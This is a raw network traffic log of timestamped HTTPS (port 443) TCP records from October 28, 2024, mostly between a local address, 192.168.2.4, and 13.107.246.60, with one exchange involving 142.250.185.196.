                                                                    Oct 28, 2024 14:03:38.344619036 CET4434988513.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:38.344940901 CET49885443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:38.344974995 CET4434988513.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:38.345381975 CET49885443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:38.345396996 CET4434988513.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:38.408885002 CET4434988213.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:38.409173012 CET4434988213.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:38.409223080 CET49882443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:38.409225941 CET4434988213.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:38.409281969 CET49882443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:38.409332037 CET49882443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:38.409349918 CET4434988213.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:38.409360886 CET49882443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:38.409368038 CET4434988213.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:38.412030935 CET49887443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:38.412075996 CET4434988713.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:38.412192106 CET49887443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:38.412358999 CET49887443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:38.412386894 CET4434988713.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:38.473769903 CET4434988413.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:38.474008083 CET4434988413.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:38.474061012 CET49884443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:38.474111080 CET49884443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:38.474124908 CET4434988413.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:38.474138975 CET49884443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:38.474145889 CET4434988413.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:38.476490974 CET49888443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:38.476521015 CET4434988813.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:38.476648092 CET49888443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:38.476778984 CET49888443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:38.476793051 CET4434988813.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:38.477705002 CET4434988513.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:38.477766991 CET4434988513.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:38.477864981 CET4434988513.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:38.477943897 CET49885443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:38.477989912 CET49885443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:38.478013039 CET4434988513.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:38.478056908 CET49885443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:38.478074074 CET4434988513.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:38.480310917 CET49889443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:38.480380058 CET4434988913.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:38.480576992 CET49889443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:38.480643034 CET49889443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:38.480663061 CET4434988913.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:38.500307083 CET4434988313.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:38.500425100 CET4434988313.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:38.500505924 CET49883443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:38.500551939 CET49883443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:38.500551939 CET49883443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:38.500574112 CET4434988313.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:38.500597000 CET4434988313.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:38.502904892 CET49890443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:38.502914906 CET4434989013.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:38.502981901 CET49890443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:38.503113031 CET49890443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:38.503123045 CET4434989013.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:39.058803082 CET4434988613.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:39.059330940 CET49886443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:39.059344053 CET4434988613.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:39.060157061 CET49886443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:39.060163021 CET4434988613.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:39.156069994 CET4434988713.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:39.156759024 CET49887443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:39.156796932 CET4434988713.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:39.157325029 CET49887443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:39.157341957 CET4434988713.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:39.190371990 CET4434988613.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:39.190516949 CET4434988613.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:39.190582037 CET49886443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:39.190623999 CET49886443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:39.190639973 CET4434988613.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:39.190651894 CET49886443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:39.190659046 CET4434988613.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:39.195766926 CET49891443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:39.195818901 CET4434989113.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:39.196038961 CET49891443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:39.196307898 CET49891443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:39.196335077 CET4434989113.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:39.224736929 CET4434988813.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:39.225337029 CET49888443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:39.225358009 CET4434988813.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:39.226070881 CET49888443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:39.226075888 CET4434988813.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:39.236280918 CET4434988913.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:39.236651897 CET49889443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:39.236671925 CET4434988913.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:39.237171888 CET49889443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:39.237181902 CET4434988913.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:39.288754940 CET4434988713.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:39.288927078 CET4434988713.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:39.289184093 CET49887443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:39.289326906 CET49887443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:39.289352894 CET4434988713.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:39.289431095 CET49887443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:39.289444923 CET4434988713.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:39.293035030 CET49892443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:39.293056011 CET4434989213.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:39.293289900 CET49892443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:39.293335915 CET4434989013.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:39.293448925 CET49892443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:39.293461084 CET4434989213.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:39.293855906 CET49890443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:39.293865919 CET4434989013.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:39.294841051 CET49890443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:39.294847965 CET4434989013.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:39.363414049 CET4434988813.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:39.363651037 CET4434988813.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:39.363751888 CET49888443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:39.363821030 CET49888443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:39.363830090 CET4434988813.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:39.363840103 CET49888443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:39.363843918 CET4434988813.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:39.366564035 CET49893443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:39.366616964 CET4434989313.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:39.366683006 CET49893443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:39.366919994 CET49893443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:39.366950035 CET4434989313.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:39.371699095 CET4434988913.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:39.371759892 CET4434988913.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:39.371870041 CET4434988913.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:39.371944904 CET49889443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:39.372014999 CET49889443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:39.372014999 CET49889443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:39.372040987 CET4434988913.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:39.372083902 CET4434988913.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:39.375332117 CET49894443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:39.375343084 CET4434989413.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:39.375399113 CET49894443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:39.375587940 CET49894443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:39.375600100 CET4434989413.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:39.427403927 CET4434989013.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:39.427552938 CET4434989013.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:39.427608967 CET49890443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:39.439013958 CET49890443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:39.439018965 CET4434989013.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:39.479927063 CET49895443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:39.479965925 CET4434989513.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:39.480052948 CET49895443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:39.480154037 CET49895443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:39.480168104 CET4434989513.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:39.608676910 CET49826443192.168.2.4142.250.185.196
                                                                    Oct 28, 2024 14:03:39.608691931 CET44349826142.250.185.196192.168.2.4
                                                                    Oct 28, 2024 14:03:39.980799913 CET4434989113.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:39.981368065 CET49891443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:39.981398106 CET4434989113.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:39.981990099 CET49891443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:39.982002020 CET4434989113.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:40.065052986 CET4434989213.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:40.065439939 CET49892443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:40.065454006 CET4434989213.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:40.065947056 CET49892443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:40.065952063 CET4434989213.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:40.105679035 CET4434989313.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:40.106612921 CET49893443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:40.106638908 CET4434989313.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:40.107943058 CET49893443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:40.107955933 CET4434989313.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:40.143523932 CET4434989413.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:40.147475004 CET49894443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:40.147500038 CET4434989413.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:40.147964954 CET49894443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:40.147973061 CET4434989413.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:40.181262016 CET4434989113.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:40.181417942 CET4434989113.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:40.181493044 CET49891443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:40.181735039 CET49891443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:40.181755066 CET4434989113.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:40.188685894 CET49896443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:40.188724995 CET4434989613.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:40.188787937 CET49896443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:40.189145088 CET49896443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:40.189162970 CET4434989613.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:40.204091072 CET4434989213.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:40.204169989 CET4434989213.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:40.204315901 CET49892443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:40.204579115 CET49892443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:40.204597950 CET4434989213.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:40.204610109 CET49892443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:40.204617023 CET4434989213.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:40.208703041 CET49897443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:40.208790064 CET4434989713.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:40.208889961 CET49897443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:40.209153891 CET49897443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:40.209187031 CET4434989713.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:40.238087893 CET4434989313.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:40.238156080 CET4434989313.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:40.238217115 CET49893443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:40.238238096 CET4434989313.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:40.238270044 CET4434989313.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:40.238321066 CET49893443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:40.238528013 CET49893443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:40.238528013 CET49893443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:40.238550901 CET4434989313.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:40.238574028 CET4434989313.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:40.241782904 CET49898443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:40.241813898 CET4434989813.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:40.242067099 CET49898443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:40.242183924 CET49898443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:40.242207050 CET4434989813.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:40.257103920 CET4434989513.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:40.258060932 CET49895443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:40.258078098 CET4434989513.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:40.259224892 CET49895443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:40.259234905 CET4434989513.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:40.273850918 CET4434989413.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:40.273983955 CET4434989413.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:40.274149895 CET49894443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:40.274347067 CET49894443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:40.274363995 CET4434989413.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:40.274378061 CET49894443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:40.274384022 CET4434989413.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:40.278276920 CET49899443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:40.278307915 CET4434989913.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:40.278392076 CET49899443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:40.279069901 CET49899443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:40.279094934 CET4434989913.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:40.391669035 CET4434989513.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:40.391832113 CET4434989513.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:40.391944885 CET49895443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:40.393234968 CET49895443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:40.393234968 CET49895443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:40.393270969 CET4434989513.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:40.393291950 CET4434989513.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:40.421958923 CET49900443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:40.421986103 CET4434990013.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:40.422044992 CET49900443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:40.427942038 CET49900443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:40.427957058 CET4434990013.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:40.928917885 CET4434989613.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:40.929332018 CET49896443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:40.929363966 CET4434989613.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:40.929864883 CET49896443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:40.929872036 CET4434989613.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:40.953763008 CET4434989713.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:40.954082012 CET49897443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:40.954140902 CET4434989713.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:40.954504967 CET49897443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:40.954519987 CET4434989713.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:41.020684004 CET4434989813.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:41.020994902 CET49898443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:41.021006107 CET4434989813.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:41.021420002 CET49898443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:41.021425009 CET4434989813.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:41.022681952 CET4434989913.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:41.023178101 CET49899443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:41.023212910 CET4434989913.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:41.023546934 CET49899443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:41.023557901 CET4434989913.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:41.060647011 CET4434989613.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:41.060796022 CET4434989613.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:41.060878992 CET49896443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:41.060902119 CET49896443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:41.060919046 CET4434989613.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:41.060930967 CET49896443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:41.060939074 CET4434989613.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:41.063210011 CET49901443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:41.063292980 CET4434990113.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:41.063442945 CET49901443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:41.063581944 CET49901443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:41.063606024 CET4434990113.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:41.085412979 CET4434989713.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:41.085439920 CET4434989713.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:41.085484028 CET4434989713.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:41.085500956 CET49897443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:41.085537910 CET49897443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:41.085690975 CET49897443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:41.085725069 CET4434989713.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:41.085750103 CET49897443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:41.085786104 CET4434989713.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:41.087794065 CET49902443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:41.087826014 CET4434990213.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:41.087886095 CET49902443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:41.088011026 CET49902443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:41.088031054 CET4434990213.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:41.155699015 CET4434989813.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:41.155839920 CET4434989813.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:41.155896902 CET49898443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:41.155941010 CET49898443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:41.155941010 CET49898443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:41.155962944 CET4434989813.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:41.155985117 CET4434989813.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:41.157854080 CET49903443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:41.157888889 CET4434990313.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:41.157987118 CET49903443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:41.158132076 CET49903443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:41.158158064 CET4434990313.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:41.391592026 CET4434990013.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:41.392534971 CET49900443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:41.392549992 CET4434990013.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:41.393661022 CET49900443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:41.393665075 CET4434990013.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:41.406807899 CET4434989913.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:41.408950090 CET4434989913.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:41.409043074 CET49899443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:41.409178019 CET49899443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:41.409215927 CET4434989913.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:41.413295031 CET49904443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:41.413336992 CET4434990413.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:41.413489103 CET49904443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:41.413918018 CET49904443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:41.413944960 CET4434990413.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:41.526842117 CET4434990013.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:41.526984930 CET4434990013.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:41.527034998 CET49900443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:41.527328968 CET49900443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:41.527328968 CET49900443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:41.527342081 CET4434990013.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:41.527350903 CET4434990013.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:41.531618118 CET49905443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:41.531673908 CET4434990513.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:41.531779051 CET49905443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:41.532136917 CET49905443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:41.532166958 CET4434990513.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:41.809921026 CET4434990113.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:41.810674906 CET49901443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:41.810731888 CET4434990113.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:41.811383963 CET49901443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:41.811402082 CET4434990113.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:41.818249941 CET4434990213.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:41.818576097 CET49902443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:41.818589926 CET4434990213.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:41.819097996 CET49902443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:41.819102049 CET4434990213.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:41.894793034 CET4434990313.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:41.895210028 CET49903443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:41.895231009 CET4434990313.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:41.895781994 CET49903443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:41.895796061 CET4434990313.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:41.943414927 CET4434990113.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:41.943658113 CET4434990113.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:41.943730116 CET49901443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:41.943773985 CET4434990113.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:41.943804979 CET4434990113.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:41.943949938 CET49901443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:41.947659969 CET49901443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:41.947690964 CET4434990113.107.246.60192.168.2.4
